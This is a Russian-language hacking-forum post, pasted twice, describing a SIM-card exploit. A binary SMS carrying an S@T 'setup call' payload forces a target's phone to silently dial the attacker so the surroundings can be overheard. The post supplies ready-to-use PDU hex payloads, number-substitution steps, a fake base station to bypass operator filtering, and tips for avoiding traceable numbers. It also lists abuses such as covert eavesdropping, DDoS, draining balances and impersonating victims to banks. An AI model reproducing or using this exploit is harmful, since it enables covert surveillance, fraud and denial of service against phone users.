Все слышали сказки, что можно прослушивать помещение через лежащий в нем мобильный телефон?
Так вот, могу вас обрадовать - "мы рождены, чтоб сказку сделать былью!"
Представляю вашему вниманию - способ заставить телефон цели - самостоятельно позвонить на нужный "исследователю информационной безопасности", номер. После чего хакер может "снять трубку" и прослушать все, что происходит рядом с целью.
Суть атаки - хакер отправляет бинарную SMS на телефон цели. SMS содержит специальную полезную нагрузку, исполняемую операционной системой сим-карты телефона, которая инициирует исходящий вызов через механизм "S@t setup call". На большинстве телефонов участие абонента не требуется, внешние признаки - кратковременное включение подсветки дисплея. Некоторые телефоны отображают сообщение "Подтвердить вызов?" , при нажатии абонентом "да", экран выключается и устанавливается исходящее соединение.
Хакер "поднимает трубку" на своем телефоне, и далее может прослушивать все происходящее рядом с телефоном жертвы. Длительность сеанса прослушивания - зависит от настроек оператора связи (длительность открытой голосовой сессии) и обычно составляет 1 час. После чего требуется повторная отправка SMS.
Текст PDU команды -
0x042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
где 2143658709F0 - номер телефона хакера в формате GSM 7bit (в данном случае +12345678900) .
Свой номер можно подставить при помощи вот этого конвертера http://rednaxela.net/pdu.php
Полный текст SMS для отправки через SMPP шлюз выглядит так:
0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
первые 2143658709F0 - телефон цели
вторые, в конце сообщения 2143658709F0 - телефон хакера
Проверить собранный пакет можно тут - https://www.smsdeliverer.com/online-sms-pdu-decoder.aspx
Операторы сотовой связи естественно фильтруют такие СМСки. Поэтому, отправляем их через собственный эмулятор базовой станции по принципу - изложенному в моей предыдущей теме . Если кратко - то сажаем абонента на свою БС, отправляем ему волшебную СМСку и сразу отключаем эмулятор БС. Абонент выполняет реселект на "легальную" городскую сеть, и команда call setup выполняется уже через обычного оператора.
Развлекайтесь осторожно, не подставляйте в apdu команду свои "чистые" номера, т.к. эти исходящие звонки логгируются у оператора и номер будет засвечен со 100% вероятностью.
Эксплоит не 100-процентный! Работает не на всех телефонах и симкартах, некоторые смартфоны показывают сообщение с требованием подтвердить вызов - но штука прикольная и рекомендуется к освоению хотя бы для того чтобы понимать возможные векторы атак на ваш телефон.
Практические варианты применения:
- прослушивание происходящего рядом с телефоном без ведома абонента
- массовая длительная рассылка таких apdu СМС с целью DDOS атаки на конкретный телефон
- можно оставить абонента без связи, позвонив на роуминговый номер и израсходовав его баланс
- можно создать платный, контентный номер телефона и инициировать звонки на него - не знаю, работает ли сейчас эта схема
Очень интересно возможно ли совместить эту схему с конференц-вызовами. Например, инициировать звонок с тлф цели в банк, по конференц связи подключить туда параллельно свою линию, после чего поговорить с банком от лица жертвы. Как думаете, насколько это реально?
Так вот, могу вас обрадовать - "мы рождены, чтоб сказку сделать былью!"
Представляю вашему вниманию - способ заставить телефон цели - самостоятельно позвонить на нужный "исследователю информационной безопасности", номер. После чего хакер может "снять трубку" и прослушать все, что происходит рядом с целью.
Суть атаки - хакер отправляет бинарную SMS на телефон цели. SMS содержит специальную полезную нагрузку, исполняемую операционной системой сим-карты телефона, которая инициирует исходящий вызов через механизм "S@t setup call". На большинстве телефонов участие абонента не требуется, внешние признаки - кратковременное включение подсветки дисплея. Некоторые телефоны отображают сообщение "Подтвердить вызов?" , при нажатии абонентом "да", экран выключается и устанавливается исходящее соединение.
Хакер "поднимает трубку" на своем телефоне, и далее может прослушивать все происходящее рядом с телефоном жертвы. Длительность сеанса прослушивания - зависит от настроек оператора связи (длительность открытой голосовой сессии) и обычно составляет 1 час. После чего требуется повторная отправка SMS.
Текст PDU команды -
0x042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
где 2143658709F0 - номер телефона хакера в формате GSM 7bit (в данном случае +12345678900) .
Свой номер можно подставить при помощи вот этого конвертера http://rednaxela.net/pdu.php
Полный текст SMS для отправки через SMPP шлюз выглядит так:
0041000B912143658709F07FF63802700000330D0000000050534800000000000042230121020744382E3130353105160604313035312D0C1003830607912143658709F02B00
первые 2143658709F0 - телефон цели
вторые, в конце сообщения 2143658709F0 - телефон хакера
Проверить собранный пакет можно тут - https://www.smsdeliverer.com/online-sms-pdu-decoder.aspx
Операторы сотовой связи естественно фильтруют такие СМСки. Поэтому, отправляем их через собственный эмулятор базовой станции по принципу - изложенному в моей предыдущей теме . Если кратко - то сажаем абонента на свою БС, отправляем ему волшебную СМСку и сразу отключаем эмулятор БС. Абонент выполняет реселект на "легальную" городскую сеть, и команда call setup выполняется уже через обычного оператора.
Развлекайтесь осторожно, не подставляйте в apdu команду свои "чистые" номера, т.к. эти исходящие звонки логгируются у оператора и номер будет засвечен со 100% вероятностью.
Эксплоит не 100-процентный! Работает не на всех телефонах и симкартах, некоторые смартфоны показывают сообщение с требованием подтвердить вызов - но штука прикольная и рекомендуется к освоению хотя бы для того чтобы понимать возможные векторы атак на ваш телефон.
Практические варианты применения:
- прослушивание происходящего рядом с телефоном без ведома абонента
- массовая длительная рассылка таких apdu СМС с целью DDOS атаки на конкретный телефон
- можно оставить абонента без связи, позвонив на роуминговый номер и израсходовав его баланс
- можно создать платный, контентный номер телефона и инициировать звонки на него - не знаю, работает ли сейчас эта схема
Очень интересно возможно ли совместить эту схему с конференц-вызовами. Например, инициировать звонок с тлф цели в банк, по конференц связи подключить туда параллельно свою линию, после чего поговорить с банком от лица жертвы. Как думаете, насколько это реально?
Последнее редактирование:
